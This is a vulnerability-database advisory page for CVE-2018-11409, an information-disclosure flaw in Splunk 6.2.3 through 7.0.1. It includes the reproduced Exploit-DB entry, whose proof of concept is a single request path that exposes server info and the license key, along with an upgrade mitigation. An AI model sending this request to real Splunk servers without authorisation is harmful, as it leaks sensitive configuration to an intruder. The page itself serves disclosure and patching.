header-logo
Suggest Exploit
vendor:
Splunk
by:
KoF2002
5.3
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: Splunk
Affected Version From: 6.2.3
Affected Version To: 7.0.1
Patch Exists: YES
Related CWE: CVE-2018-11409
CPE: a:splunk:splunk
Metasploit: N/A
Platforms Tested: Linux OS
2018

Splunk < 7.0.1 - Information Disclosure

Splunk through 6.2.3 7.0.1 allows information disclosure by appending /__raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key and other information.

Mitigation:

Upgrade to Splunk version 7.0.2 or later.
Source

Exploit-DB raw data:

# Exploit Title: Splunk < 7.0.1 - Information Disclosure
# Date: 2018-05-23
# Exploit Author: KoF2002
# Vendor Homepage: https://www.splunk.com/
# Version: 6.2.3 - 7.01 MAYBE ALL VERSION AFFECTED
# Tested on: Linux OS
# CVE : CVE-2018-11409

# Splunk through 6.2.3 7.0.1 allows information disclosure by appending
# /__raw/services/server/info/server-info?output_mode=json to a query,
# as demonstrated by discovering a license key and other information.

# PoC :

https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json

# Greats : Cold z3ro , ihab pal and all HTLovers "We Are Back"